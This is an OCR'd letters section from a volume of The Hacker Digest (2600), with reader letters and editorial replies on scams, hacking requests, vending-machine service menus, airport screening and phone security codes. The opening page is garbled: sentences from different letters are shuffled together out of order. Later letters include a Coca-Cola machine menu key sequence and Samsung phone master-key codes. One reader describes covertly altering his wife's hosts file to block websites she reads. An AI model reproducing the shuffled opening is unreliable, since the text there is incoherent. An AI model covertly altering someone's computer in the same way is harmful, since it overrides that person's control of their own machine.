the early termination fee.” She was able to effectively pay only $80 for the remainder of her contract period rather than the $150 it was going to cost her to cancel early. And Telefonica is also not very popular because of some faults on their Internet service. he was in the news because he kidnapped some Orkut communities with an exploit. I work for the Evil Empire (AT&T) and have access to pretty much all the systems. really.THE HACKER DIGEST . Thanks for letting us know about this. This letter sounds like a shameless plug. whatever field they may be in. Dear 2600: First off: goodness! Did you really send that fellow every copy of 2600? That would rock! I am 14 years old and a budding hacker/ phreak. The country is right now in the midst of a controversy because of a proposed law to typify digital crimes. katkat Conspiracy theories are always interesting and fun to watch. most conspiracy theories are part of the conspiracy themselves. as long as you question them as much as whatever it is they’re questioning. I will do it for just the gratification of helping others. not just a technical one. and others. I always download your radio show and have purchased a copy of your anthology. theorizes that Obama won because he was seen as most acceptable to the public and the people who apparently always run the government. this information can help anyone who finds themselves looking at the green grass on the other side of the fence.who have access to things we can only dream about . She would just have to be willing to give up her current number and get a new one with her new carrier if she still wanted to switch. Dear 2600: I was not really sure which email address to send this to but I wanted to get some information on submitting photos to the magazine. DSLAMs. none of this “teach me to hack” crap. It’s available on YouTube. plant.” which means one to four years of arrest. This is a great example of how people within certain organizations . try browsing The Reality Zone (http://realityzone. The police already have gone to his house. dmchale Dear 2600: Since 2600 seems to be a sociopolitical magazine. Brad We look forward to receiving your submissions. but in some serious trouble. No! I have decided to develop myself through reading and exploring with specific questions and answers. Thanks for helping to preserve the hacker spirit. Good stuff!
All Sorts of Questions
239
. It will be interesting to see what happens. He will be indicted for “distribution of secrets. I might just be a phreak but I believe some other people would like to see everything from the ancient equipment to the latest and greatest. MDF. since the current number would still be “active. but even I think some of the ideas in the documentaries and the site sound too surreal. too.” (Is he a “hacker” or “digital prankster” . Thanks for your time and consideration and. If you are interested in these types of things. and also put up a website for anyone to verify this security flaw. I still have to check the claims. etc. I get to see this stuff every day. Apparently. they also want to indict him for his previous acts. and other ideas regarding the Internet. I wanted to send you and your readers this information. It’s available on Google Video. He found a way to access private data from customers of the Telefonica phone
company trough the Internet. 2001. Happy watching (and reading).can make our world so much more interesting simply by sharing information. Flickr. and taken some of his equipment. armed with guns. and she’s been happy with her new hardware and service on her new carrier ever since.who knows?) Some time ago. Now the company is accusing him of data theft. the organization. When people tried to access sites such as Google. com). Blogger. But. switches. directed by Alex Jones.) Dear 2600: Vinicius K-Max is a well known Brazilian “computer enthusiast. After all. he presented a fake page saying the organization considered the requested page to be an inappropriate website. With luck. as always. He hit the news again in the first Campus Party last year by redirecting the traffic of a LAN to his laptop. (We’re waiting for the documentary on that. Now K-Max is in the news again. The documentary ZERO: An Investigation Into 9/11 directed by Franco Fracassi and Francesco Trento has some interesting claims about what happened on September 11. I would be more then happy to write up a small article on the piece of equipment that is in the photo as well.

sure enough. in theory. were we to respond to this person via return email. So please let me know if you can assist me with the order. and somehow the only way to make the order go through would be to involve bank transfers to third parties once their payment to us had been received. where can I get it? Or where should I start? Apple Freak A good place to start is by defining your terms. But. I really appreciate everything you folks there at 2600 do for me and everyone else. These things take time and you will almost certainly not get it right from the start. Or perhaps
240
. break even. However. You need to gauge your readership and figure out where your content is coming from and how much of it you can manage for each issue. Naturally. yes. there are thousands of almost identically worded letters floating around on the net. then you have a much better chance of evolving into a regular publication that might. We suspect the authorities already have. printing our reply in a magazine pretty much defuses the whole thing right away. If you can accept that and work it out so that in the worst case scenario you don’t lose a fortune. and material into this project and you may never wind up in the black. Dear 2600: PLEASE I NEED TO KNOW IF YOU HAVE TO CALL TO CUBA. And please do not forget to include your web page in your replying back to my mail. Dear 2600: I want to place an order on your store and I would like to know if you ship to Australia. We would be enticed by having the amount they pay to us be substantially more than what we needed to transfer to the third party. that letter I just wrote did feel somewhat like conquering a mountain! Or taking down “the man!” Hooray! Leone263 It sounds like you’re on the right path. still work. Wow. visit a corner grocery that sells phone cards. taking pictures. I will be very glad if you treat this email with good concern. The best advice we can offer you is to let your zine grow into a rhythm. I was thinking of starting my own small quarterly magazine and was wondering if you had any advice. Nicolas Why on earth do you think we’re the people to ask about this? Go shop around. The important thing is to realize that you will be putting effort. Dear 2600: First of all. or ask random people on the street. money. Random ballyhoo: how many people make up the staff there? Just curious. (That in itself is a bit strange since someone should already know this if they’re interested in ordering something from us. their payment to us would turn out to be fraudulent and any money we sent out would be lost along with anything we sent them in the mail. What’s the scam? Well. We have a handful of people who devote their entire lives to our organization (not counting all of the lunatics who do this without our knowledge). In answer to your query. My method of payment will be credit card. no matter what. we do ship to Australia. You also might want to find a way to unstick your caps lock key. I have found the hacker community welcoming and informative.THE HACKER DIGEST . The latter would be a frighteningly large number if we ever tried to calculate it. Voice over IP is one category that has almost infinite worlds of possibility. participate in online forums where people actually discuss this stuff. etc. Most new zines either overdo it and get burned out (or lose a ton of money) or don’t put in enough effort and wind up never really going anywhere. we would undoubtedly get a followup asking for a list of products we sell. I recently subscribed to 2600 and I love it. lending expertise on a variety of technical and non-technical fronts. at the least.VOLUME 26
Second (or third) off: Thanks. Thanks! Michael We assume you’re talking about starting an actual printed magazine as opposed to something online. I will await your prompt response as soon as you receive this mail. having that printed object in front of you is an achievement you will be proud of for many years to come.) They would then send an email ordering a large number of items. if only because it requires a certain commitment that oftentimes doesn’t exist in the glut of electronic prose. Thanks. ask Google. and then there are people who contribute what they can. That’s why it’s always better to try and fail rather than avoid failing by not trying. Incidentally. it depends on what the definition of “staff” is. Frank Moore This one almost got us but it actually is part of a scam. which is why they live in constant fear over what we might do next. Thanks for writing. first of all.” Needless to say. GOOD RATE. there are exceptions on both ends of the spectrum but print is in our blood so we’re naturally going to feel its magic. Good luck. Going print is a lot harder and has many challenges but we find the printed word is more enduring. It’s hard to imagine people falling for such schemes but it happens all the time and the fact that even for a moment we thought this was a real letter indicates that these con jobs can. There is no one phone system obviously but there are so many different aspects to phone networks today that it’s hard to sum it all up with one label. whether it be through writing. The “good concern” is what seemed a little fishy so we checked online and. most likely an additional amount for our “trouble. Dear 2600: If I want to get more information on the phone systems nowadays.

The email address is payphones@2600. 19 Jul 2009 11:06:51 -0400 Subject: OperationUtopia Just got this e-mail & thought you might be interested. A proactive approach must be taken. who some have called the secret society. if not to support the secret society. & if enough people play the game they will have a workforce unparalleled in recent history. We can say almost certainly that any phones submitted to us in recent memory would be of a very different style than those in use back in the 1970s. Of course. operationutopia@hotmail. Pass it on or check them out-you may not believe what they have going on. Its about a betting site and they have in every betting house a TVs on them are going recorded dog bets 1-6 my question is can we hack them to see whats next bet on dogs there is a lot of money to win can you answer me please bye :) Arnel You want us to somehow help you hack dog betting? Other than fixing the races (let’s hope you’re talking about races). .THE HACKER DIGEST . I ran a search for e-mail addresses associated with 2600 articles. on some sort of online forum. don’t worry about size (however. Every phone everywhere is a portal. Dear 2600: I have read on your site very nice things but I can you help me please with some hacking.VOLUME 26
you’re interested in private networks (PBXs). or should I upload them to a specific place? I don’t want to blow up any mailboxes. ----. Dear 2600: FYI in case you’ve not gotten this yet. and please provide as much info as you can on the phone being submitted: where it was found. we will hear it from them. And don’t forget the method so many of us used to figure it all out . the more traditional long distance phone companies. I have heard they communicate via encryptions based on the non triuial zeros of the riemann hypothesis. For everyone else.hands-on access. controlled public manipulations through cyberwarfare & cyberattacks. no matter who the real terrorists are. For them to have remained anonymous for so long is remarkable from what I hear they have done & who is with them.com. As well. etc. Forward all this info to as many hackers as possible. images that are too small won’t print well). it might be difficult to find actual photos of payphones with much attention to detail. This group. Thank you for your time. From the outside oputopia looks like a game whose solution is figuring out what the secret society really is. which media outlets claim came from North Korean sympathizers are real is a moot point.not for this issue and not even for the day that this was received. Whether things like the recent DoS attacks on the Pentagon. Dear 2600: I just came back from Mauritius (very small island in the Indian ocean) and took pictures of two different payphones for you. should I include a caption with each? Scott Brown Since one of your pictures has been printed. reactionary defenses from these types of threats to net neutrality & freedom on the net will be to late. Do you have any idea who/what this is? ---------. Heavy stuff. what precisely do you think we can do? We’d like to say this is the most unclear letter we’ve ever gotten but it wouldn’t be true .
241
. but you’ve thoroughly spooked us out.End forwarded message ----Sai No. Steven As that was a fairly chaotic period in the country’s history. or by meeting other like-minded people at conferences or 2600 meetings. exploring your local bookshop or library is another great way to learn. whether that be in the letters section here. If there is no independent arbitration & things like this go unchecked networks will become locked down as a response to this cyberterrorism. we trust you found the answer. when I send the pics. any interesting facts.. Dear 2600: In the recently published The Best of 2600 book. there is a mention of a 1991 video covering Dutch hackers accessing military computer systems in the United States. How ever did they find out our secret plans? Dear 2600: Would you have any photographs or information on the payphones that would have been in use during 1970-1975 in Vietnam? I am researching props for a production of Miss Saigon and would love to be as historically accurate as possible. They were taken with a 12MP SLR so they are five megabytes each. We seem to have become the clearinghouse for the dazed and confused. Anyway get word to as many hackers as possible.. Should I email them together or separately. We’ll keep you in the loop.Forwarded message ---------Sent: Sun. You can get a lot of info just by asking. an independent non-national group of hackers has sprung up.. is gearing up to launch a global alternate reality game where everyone who comes into contact with them will be working on a project called Operation Utopia. at least to investigate them & question their motives.com is a contact point. our readers are a tremendous resource so if there is an answer to your question. Also. how the switches themselves are wired together. Is this video still available? iphelix That video hasn’t been available for some time but you can expect it to rear its head as we digitize some of our older material. However.Due to the threat of gov. or maybe just some history on how it all used to be. In actuality it is distributive hacking. If these guys are for real it will change everything.

why should I participate in the ongoing technological charade. give me one good reason why I should use a wireless anything? Second. an old fashioned typewriter has just the right amount of technology. But I also draw. To say that typing on it was a humbling experience would be a severe understatement. I also would like this clarified before I spend my valuable time writing something in a format your magazine may consider obsolete. Sure I hack. First. I own a Dell laptop running XP and an older desktop running Win 98SE. I am retired after 30 years of teaching. My father was career USAF and reached full colonel. There are also security concerns if proper precautions aren’t taken with regard to protecting content. But in the case of wireless devices that transmit. and text. I value tangible things much more than I value seeing information on a screen. never has to be restarted. I don’t have to worry about draining power and can pick up right where I left off. It has an infinite amount of storage space because I can always purchase a new box of paper. computers. and travel. Do you think that you can hack this site? Cause they’re always proud that they’re well protected and back up frequently. but it might not do me any good in getting it printed in the mag. Dear 2600: I was banned from this site just because the admin got the bribe from one member and when I questioned him why he banned good members without giving notice and keep the bastard just because they kissed his ass and bribe him with gift card money. he banned me without notice too and deleted my thread to erase the evidence. We weren’t particularly happy about it. The operating system never needs to be upgraded and I don’t need to worry about registering it with the company I bought it from. write. we’ll do whatever it takes to include it. I cater to the desire to see and touch real things. the health effects are still somewhat unknown. this “letter” was really an email to 2600. First. just like when Emmanuel Goldstein states that the printed word is still the most valuable form of communication. based on what I read in 2600 every quarter. we will print it. In other words. or for that matter. The desktop is run off-line and my laptop is used almost exclusively for email. I’ve read your magazine off and on for years. When was the last time any of us sent or received a real letter? It’s been too long. As a final note. Julie Let’s tackle your first question first. a letter can be two things: something written out by hand or something that is typed up. every other charade that Americans suffer from our government? Thanks for publishing 2600. Now to your second question. then sent through the mail. We regularly transcribe typed and handwritten letters and articles (the only way people in prison can communicate) and in the past we’ve even transcribed articles that were spoken into our answering machine. Phones. Don’t get so engrossed in staring at screens that words on paper don’t mean anything to you. And when I walk away from typing. I have no husband and no children.VOLUME 26
Dear 2600: I am a 53-year-old woman and only child. My typewriter never gets viruses. play video games.THE HACKER DIGEST . Write a note to your buddies congratulating them on a good business meeting! Write your girlfriend and thank her for last weekend! Write to an incarcerated 2600 reader! Put down that Blackberry and pick up a pen! For me. I live in my parents’ home. The point is that if it’s something our readers will appreciate. I know you guys would gush over a real written letter. I would like to know if you actually accept letters. We have no comment at this time. Being creative by nature. Dear 2600: I have an interesting issue regarding letter submissions. which I inherited. We can’t be creative as hackers if we don’t understand the technology that got us to where we are today. but it needed to be done. prompts me to ask the following questions. Good luck to all in reconnecting with your creative side. but some people may be confused about this terminology. radios all can be used with more flexibility when there are no wires involved. printed out. I’m not going to write or type a real letter until I know how 2600 will print it in the magazine. My question is this: What if someone were to write you a letter by hand or type it up and send it through the mail and you wanted to print it in the magazine? Would someone at the office type the letter up on the computer? What if it was a lengthy letter? I think clarifying this would satisfy the dwindling number of us who still value this timeless form of communication. Sometimes wireless things are more convenient. Of course you accept emails. Thanks again for a great magazine! sc0ut If the letter or article is interesting and informative. You can certainly survive just fine without using wireless technology if you so choose.
242
. mostly because these devices haven’t been around that long. I recently purchased a fully restored typewriter from the 1930s from an online store. It gives me a feeling of nostalgia and excitement that I can only compare to receiving the latest issue of 2600 in the mailbox. and never crashes. For me. Find me a computer that still works after almost 80 years. Both parents are deceased. since it’s a fact that extraterrestrials have visited Earth on countless occasions and that the United States is in possession of a vast amount of advanced extraterrestrial technology. That. and being an Air Force brat.

All of our security systems have a computer/ network component. Dear 2600: Why 2600 don’t have meeting in Malaysia? Fiez Just a guess but probably because nobody in Malaysia set one up. sigflup Finding a manual online for this particular model or simply trading information with other people who have access to this machine shouldn’t be too hard. Dear 2600: I have been in the electronic security industry since the early 1990s. If we label the column of nine buttons 0-1-2-3-4-5-6-7-8. you can press 0-3-1-2-0 to get into a menu. the RAID array. My name is Ray. and helping keep us out of the camps.000 to $40. This is years in many localities. You can press up and down to select between these and press 3 or “select” once you have one that you want. you advertise events for ToorCamp and HAR2009.” In the back of the mag. in the Marketplace.
Son Yes. “ubr”. I always ask people in my business if they read or know what 2600 is. Is there any way that I can enter the Honduran database to alter my date of entry and my port of entry? Thank you for any help that you can give me. In fact. Haven’t gotten it to dispense the soda for free yet . Unplugging the machine and replugging it back in didn’t change anything in the menu. Video images are sometimes stored for the length of time allowed to file a lawsuit against the store. If anyone can do this too. although this deterrence is a side benefit. It could get a little tricky. I guess these are sale counts but there are only nine sodas to choose from . “rbn”. at first installing and later designing and selling CCTV. An “Intellivend 2000” to be precise. The main issue is the store protecting itself from fraudulent “slip and fall” personal injury lawsuits. You have to sell a lot of lettuce to buy a $30. Don’t know what this is. oh yes. Next time. and integration packages. access control. It is no wonder that IT managers cringe when they see us pulling into their parking lots! I want to remark on an editor’s response to a letter by Estragon concerning CCTV systems in supermarkets. Oh. And.10. A year too long. “Thanks to 2600 for doing what you do. The rest were a bunch of different numbers. 0 becomes “back”. and “sale”. And mess with the memories of the people who were supposed to have seen you for the past year.I have to figure this out. Ray So you’d like for us to erase a year off of your stay in Honduras? There’s bound to be a good story in here somewhere and we’d really like to hear it. Reading a book by its cover can be mislead-
243
. and for way too long. We’d probably have to change a second country’s database too. Don’t know what these are. I think that your fine magazine should be mandatory reading for anyone who works in any security field. The reason is not to stop you from shoplifting a steak or some dairy products. write in. I’ve been a reader for so long that I forgot when I started. but if you prevent one fraudulent lawsuit. though. the system has paid for itself many times over. Dear 2600: Hello. 1 becomes “up”. Selecting “eror” gives you “sts” and selecting that gives you “da” one through twelve. This same remark can be applied to many surveillance system installations. I looked around for the same model machine so I could try it on two vending machines. 2 becomes “down”. expensive. assuming you’re actually in that country and aren’t simply asking from somewhere else for some reason.THE HACKER DIGEST . I am visiting Honduras. Thanks for thinking of us. It has a column of nine buttons used for choosing which soda you wish to buy. It always amazes me that my industry “peers” seem to know so little about computer networks and less about network security.
Dear 2600: I read the letter from Vandy. We have a hunch it might be a little more complicated than simply changing dates in one country’s database. Selecting “ubr” displays “67015-6”. as shown on its little red LED display has “eror”. most interesting machines have documentation that would make really good articles if translated from manualspeak. 11. Root menu. Hence. You are nominated. Supermarkets which operate on a notoriously low profit margin are able to win discounts on insurance for having these systems installed. the irony! eddiehaskell Dear 2600: I’ve been wandering around the skyways today and discovered a Coca Cola machine. fire alarm systems. and finishes with.VOLUME 26
Let’s see who’s better. Many “mega-stores” may have 64 or more cameras and four or more DVRs connected to RAID arrays to collect and archive video (to be stored for years in some cases). He continues at length about what we know and don’t know. Selecting “rbn” doesn’t do anything. intrusion. and 12 were all “0001” on the machine that I was looking at. and the answer is almost always no. Selecting “sale” gives you “0002-6655” and selecting that gives you a choice of viewing “sl” one through
Interesting Observations
twelve. I’m going to experiment with holding down buttons and unplugging/plugging it back it in. Large CCTV installations in supermarkets are very common. But we’ve said too much. but I couldn’t find any.000 CCTV system. this is exactly the kind of thing we want to get involved in. and 3 becomes “select”.

I was running late.VOLUME 26
ing. Simply gross incompetence on the part of the security agents.austinhackers. Being a frequent flyer. airports. Imagine my shock when. I didn’t want to complain ( I mean. if you feel like slacking off a bit. Another thing. I brought it up to the man and he said “Oh well. I always streamline my process to avoid hassle. Just thought a view from a different angle might be enlightening. and in hindsight I’m very grateful to be writing this from the return flight. Mr. I’ve been a longtime reader. was my 26:2 issue of 2600. This. I even remember the security agent’s smile to me as he saw me doing a professional check of my body for metal before going through the detector. And I didn’t get the picture in time.org Golden Helix Scary. these stores need this protection to stay in business. and. I do wish I could of helped some way with Kevin back then. It took me about 15 minutes to find it. looking for nonexistent liquids).. by the time I got my bag into the tub for screening. but in many cases. UncleJesus This kind of thing happens all the time and yet we still get charged by stores for “missing” issues as if it were somehow our fault.” So I took it. and a flask (which could conceivably have contained anything) still in my bag. It’s yet another example of how publishers are getting screwed by a monopolistic industry. This frequency rings a bell for me. I must say. I just watched Freedom Downtime and I have been reading The Best of 2600: A Hacker Odyssey. You guys rock. ain’t it? Dear 2600: My subscription lapsed and I went to my local Borders to pick up the newest issue. He then just gave it to me free. I’ve composed numerous articles in my head. and run back through the machine twice as well. The incredibly slow and. Yes.” but honestly. What had fallen out in front of the tub my bag was on? Rolling face up on the conveyor belt towards me. Seriously. but of course this we already knew. rather than a cell. I missed out on so much. You know. storing images of shoppers (including me) grates on me.austinhackers. In the example shown here. My bag was deemed suspicious. complete with its “Hacker History” and “Hacker Factor” (yes. and have been flatly disgusted with the current security procedures used by U. the one where cbsm2009 shows how simple it is to subvert airline security. Dear 2600: It appears that some “hackers” play golf but may not in fact be technology enthusiasts! I know the back cover photo is supposed to be something in real life. I discovered an explosive. no sharp objects.. Me Sent from my iHack Dear 2600: I am a new and avid reader. Dear 2600: I heard a news bulletin on BBC Radio 2 state that the British government’s National Pandemic Flu Service website went down after receiving 2600 hits per second. Levi del Valle While you may have missed out on one bit of history through no fault of your own. is not the reason for my apology. Here I was back in high school from 1997 to 2001 just messing around with the computers. Just letting you know. There simply is no reasonable security system in place. although I definitely do penetration testing most every time I fly. but I ran across this site.THE HACKER DIGEST . and couldn’t help but share the URL with the rest of you: http://www. two electrical ignitors. It was stuffed behind a stack of Macworlds. I just wish I had found out about 2600 then. taken out for inspection (twice. no electronics. as we know. remember that what you do now will form the next piece
244
. and might I say you are a breath of fresh air in the stagnating pool of puss that we call the mass media. I have a very strong sense of both civil liberties and security. I would say “keep up the great work.com However. and though this is the first time I’ve actually submitted anything to you. however. There were no liquids. Obviously. What we didn’t know was that the carry-on I used for the first leg of my current flight had not been emptied since July 4th. useless scrutiny of every person’s ID and boarding pass bottlenecked the lines. My carry-on was now in several pieces. if you are/were looking for the other kind of hacker.S. you deserve it. Keep the First Amendment alive. but this was not the case. But here I go rambling on. the motive is purely economic (could even be greed). and here is where my apology comes in. Perhaps one of your readers knows where I might have heard of it before. check out: http://wiki. He tried about 20 times but it just didn’t happen. the old man at the counter couldn’t ring it up. Fossey Dear 2600: I owe you an apology. I took the few they had and put them in the wire cage on the front of the shelf. after arriving at my destination. after these many years of quality. who doesn’t like free stuff) but I thought it harmful to 2600. The Security Department We thank you for showing us a different perspective on this. it was an incredibly irresponsible oversight on my part. I corrected the problem and expected a smooth process through screening. like running Windows in safe mode just to bypass the password login so I could try to get on the Internet and look up some SNES roms and Napster songs. of course (double pun!) the pun was intended)..

if it can be determined how or where this is set. We know a number of people are facing the same predicament as you but there are no immediate solutions. but they are clearly marked with NYPD. I could have snapped a few photos if I had been carrying my camera. or crazy. Please help or refer me to someone who can. I would greatly appreciate your response for this matter as there is no other way really to replace all the files and I put a lot of effort and time into acquiring some and creating others! Thank you very much! Steve There are allegedly companies that specialize in recovering such data but we can’t vouch for them. if those stats even exist. so when security checks the boarding pass and the ID. I run Windows XP SP2 and created a password a few days ago for the flash drive. It would be pretty lame if someone attempted to impersonate a passenger for whatever crazed reasons. So what? Using an assumed name has nothing to do with security. And stealing has always been relatively easy. There is magic in every generation as well as the ability for a single individual to effect significant change. They responded that these things are not possible and that the information is encrypted (password info or my data?). nine characters and I know it for the most part. They actually had a small chainsaw in the glass case! I was surprised at how easy it was to get my e-ticket from the kiosk. The one factor that never seems to disappear is the constant reminder from those in charge that makes us feel as if we have no actual power. And the boarding pass did not have an address on it. This is the flip side of implementing security: you may make things so secure that you lock yourself out. the drive will lock permanently! I didn’t realize I would be limited like that! I believe I would figure it out if I had a number of other attempts available.THE HACKER DIGEST . At worst. Though lame. We think the most promise lies in somehow defeating the limit on password attempts. But today (8/21/09). and have even made up a fake ID in the victim’s name. I believe it is in fact possible! Please tell me what all the options are. only the spelling of the names on the boarding pass and ID. If there was any sort of hint question you used on setup. or 4) to retrieve the data.VOLUME 26
of the puzzle. You still would have to go through airport security so it’s not like you’ve defeated anything on that end. JZ If you have all of this information.0 flash drive from mid 2008. Perhaps statistics on passenger impersonation incidents are not high enough to change anything. You can be a key part of that or an important element of something else altogether. we suggest looking at that. I called Sandisk and they said I can select to redo the drive which will allow me to use the drive again but will erase all the data! This is not an option! I asked how I can 1) get a default password. Dear 2600: I recently traveled through the Denver airport. The password is. Of course. it seems you’ve already invested quite a bit of effort into getting someone else’s ticket. I know Sunset Park has cameras near intersections. whereas the helicopter I saw had no markings amongst the black paint. all you would have done is rip someone else off for the price of a ticket that for some reason they never bothered to cancel. Dear 2600: I have a Sandisk Cruzer Micro-USB 2. I did not have to show any ID or anything beyond entering a 13 digit number. I believe. would probably wind up with your little ruse being exposed. they need to mark this as such. remembering a password really
Cries for Help
245
. New York. 2) retrieve my password. but I think it’s just too easy and simple to print out a boarding pass by using a 13 digit number. I saw a black unmarked helicopter mounted with a large surveillance camera underneath the cockpit. unlike in the movies. But nothing could be further from the truth. I need high level support for this situation. nor does it have anything to do with security. I was walking on 5th Avenue and 45th Street in Brooklyn at 1:48 pm when I saw it flying low over the 4th Avenue area. they will not have to compare addresses or faces. But let’s say that you managed to pull it off. It’s been hammered into our heads that we need to be identified and checked at all stages of travel but there’s nothing really convincing in that argument. when walking down an avenue in Brooklyn. there aren’t a lot of exciting or unusual things occurring. not assistance from amateurs. the public needs to be more informed about such matters. it seems fairly easy to impersonate a passenger if one has access to the 13 digit e-ticket number and a fake ID with the name that’s printed on the boarding pass. 3) edit the drive to allow more password attempts. I wish I had taken a photo of a glass case with all of the items that are not permitted onto airplanes by passengers. idiotic. We have no choice but to assume you’re making the whole thing up because you didn’t have one. Dear 2600: Usually. If it was not NYPD. We assume you also would somehow know that the person wasn’t going to show up and cause a big scene which. I tried a few attempts but after four it now says I have one left and if it too is wrong. know exactly where to go. Jason Which is precisely why people should always be carrying a camera. If it was NYPD. There are constant changes going on in the world of technology and in how society handles it all. I didn’t write it down and have now attempted to access it.

Please remove whatever backdoor your members have put on my computer. Years ago. the only two choices I had for my “first issue” were Spring and Summer. I know these keys have some collector value and since they’re not the type of keys I collect.” However. Best of luck in your career as a prosecutor. it’s OK really. I owned a telescope when I was a child and used to see the same kind of color distortions when I screwed my lenses together wrong.. But this actually
General Feedback
246
. Please let me know and thanks for your time. I’d really prefer to avoid the police or a confrontation in that way.. Sometimes a head-on confrontation is the only way to deal with such matters. I already have proof that one member has already hacked my computer. The keys to input to get to the admin settings (which you already have) are allegedly “*#3695147*#. what Ethernium57 described in his story is a lens configuration issue and not. and Hakin9 are my three favorite magazines (in that descending order). I want to sell them to help recoup some of the money I spent on the lot and identifying the makers will help me with this. When the officers arrive. I was after some other keys in the lot. josh We’re told that the master key setting is “*#3971258*#” or “*#9072641*#” but that could be different for your particular model. I don’t like it. 2600. If there’s a chance these keys still work on existing payphones. so I can have my first issue as the Autumn one and not get a dupe. Jim You’re best off talking to people who collect either the old phones or some of the same types of keys. Make. If it is. I was wondering if you can get the master key for a cell phone (Samsung Eternity) or maybe you can tell me where to find it. I can send you pictures of the keys. Please help me. I’ve been able to identify most of them as “Western Electric. I have hard evidence that I was hacked. even though it’s for a phone they already own. I found the admin settings. so I immediately went online to renew. In the end. a clandestine moon base. however. 3lan The software we use for our online store exists to make even the simplest things as frustrating and complicated as possible. Is there a chance you can help me to identify these other keys and maybe also confirm the others are in fact “Western Electric” as I’ve been told. but no success on master key. I won’t say who did it because I need this evidence for a courtroom so I can have an advantage as the prosecutor. I just received my summer issue today and noticed the RENEW! notice on the envelope.” It’s amazing how many people accept the premise that they’re not allowed to have this information.. It might be good also to make sure it’s legal to possess these keys. Leaving windows open on a machine is an invitation to burglary and there’s nothing funny about that. after all. we’ll be sure to have all of our staffpeople help them figure out what’s really going on. I will have to wait until that changes.. the person is a member of 2600 in some way. however. you may just wind up with a really valuable lesson out of all this. If people from your magazine continue to illegally hack my computer. Dear 2600: I’m a key collector. Dear 2600: Hey guys. Considering we don’t actually have members. anonymous We think involving the cops is the best course of action at this point. If this is something you can help me with. Dear 2600: Recently. The “rectangular beams” he describes. a couple of contributing editors from 2600 the magazine have been hacking my computer. then going to various hacker or ham radio gatherings. So we’ll await the authorities and then lead them to the “member of 2600” that is making your life so miserable. I’ll call the police. They found out I had Knoppix on my computer. However. I did a whois on the domain and couldn’t get an abuse email so I sent it here. it shouldn’t take long at all to get this resolved. I suppose. I’ve recently learned these keys are older payphone keys. as he suggested. Gary Dear 2600: I first wish to thank you for the variety of information that you impart in your magazine. you might not want to let too many people in on that. It’s that someone is hacking me and opening many windows on my machine and I want it to stop. These people need to be taught a lesson. Dear 2600: I don’t think it’s a writer of the magazine anymore that hacked me. or posting pictures online would be good ways to share information on this. I purchased a huge lot of keys on eBay. Good luck in your endeavors. We have an unmanageable staff and this is really the only way to get through to them. You might want to consider asking the folks at Toool (The Open Organization of Lockpickers) who are easily findable on the net. there are some keys I can’t seem to identify the make of phone they belong to. are quite anomalous. however. I did not see a ‘’renew’’ option. there were some very interesting keys that caught my eye because I had never seen any like them before. So I kept them. Dear 2600: As much as I want to believe there’s something happening on the moon.VOLUME 26
shouldn’t be this big a deal in the first place. A call to The Art Bell Show might clarify that issue.. anonymous (again) No.THE HACKER DIGEST .

Dear 2600: What is the correlation to the two Emmas? Is that really the same tag that was shown on the baby’s shirt in the last issue? Is the “real” operator Emma the grandmother? Fiddles McHace It’s all in the history books. People have tried to create words like “cracker” and “black hat” to define the more criminal elements in the hacker world. But eventually. I think it is time you admit to yourselves that the word “hacker” has been redefined by society. Approaches like using the first letter of the words in a song lyric have the advantage that the password is easy to remember while still being pseudo-random. it is not “bulletproof against dictionary attacks. That is your opportunity to reach them and educate them with what you see as reality. or even hysterical laughter. Hopefully. how about a contest to come up with a new term for us? I’ll start with the lame suggestion of “System Scientist” tavis You can make yet another term if you wish but you’re going to face the exact same problems. which takes places every decade. in most movies and books. What you mention is a feature we admittedly should have had from the start. And you may be surprised by how many people already know that the mass media label is inaccurate. it’s not (just) the length that counts.” you might see such reactions as panic. however. Dear 2600: On the assumption that Dan’s letter was not an exercise in sarcasm. An entire sentence can have less entropy (the degree to which one character is random compared to the other characters around it) than an eight character pseudo-random password. I question most of it.com (the Alex Jones sites). I enabled Apache on her Mac.tv resolved to localhost. rather than retreat and concede something as important as a description of who you are.” Any info that can be shared would be appreciated. While my wife was away. no amount of social pressure can change that. all of the words are in a dictionary. After all. In this case. As they say. it doesn’t necessarily make for a better one. we will have that up and running. Any good dictionary attack program has multiple-word attacks. yt Dear 2600: I love the cover on the Summer 2009 issue. had it repeat the image so no matter how she scaled the screen it was plastered in the entire browser window. I found a cute small orange pirate skull and cross bones jpg and. Of course. In other words. Or it will be. However.” you are only holding the hacker community back. albeit through unconventional means. you have their attention. envy. After all. including the flip side being our power hungry government! So I’ve had enough of the doom-n-gloom and decided to somehow kill those sites.com and prisonplanet. It is just like how Frisbee started out as a brand of a flying disc and is now the de facto term for a flying disc. the negative connotations will still be out there. they may be filled with all sorts of misconceptions and factual inaccuracies and you may find yourself being bombarded with a number of them as a reaction to your proclamation. it’s not possible to access that information remotely. Dear 2600: My wife has this obsession with prisonplanet. Second. through some html. we don’t suspect their interest level would last much longer than wondering why you just walked up to them and said that. We can. But all this does is give the mass media more words to demonize us with without adding anything constructive. I was looking for a photo credit and perhaps an indication of where and when it was taken. However.THE HACKER DIGEST . while a sentence does make for a longer password. Now. disgust.VOLUME 26
isn’t an example of that. is at odds with the “Bicentennial Schedule. It’s time for a new term. By holding on to the word “hacker. I would like to point out a few problems with the approach of using a sentence as a password. You are fighting a losing battle and no amount of education can turn this word back to what we want it to mean. by the time you read this.
247
. The reference to the census. First of all. it’s not beyond the realm of possibility that the sign was simply lying around for a few years. you will have dispelled a myth about what hackers stand for. and modified her hosts file so that infowars. Dear 2600: Every issue you go on and on about how hackers are portrayed wrongly and blamed for things they don’t do. We find it’s better to stick around and fight for a belief. Ed Greenberg While finding out for sure is a bit difficult at the moment. tv and infowars. those words will always be countered. use the tarnishing of the word to our advantage if we’re creative. This can and should be a good thing. with enough people. There are so many artifacts represented in it. since we don’t keep our subscriber database anywhere near a net connection. hackers are the good guys and the ones who eventually save the day. And while some of his stuff makes total sense.” Despite the fact that there’s more than one word in the sentence. If you do a good job. what we can do is add a feature that allows you to input your subscriber coding from your envelope and have us apply the renewal. if you were to walk up to someone and admit that you were a “system scientist” or whatever phrase you come up with. if you said you were a “hacker.

THE HACKER DIGEST - VOLUME 26
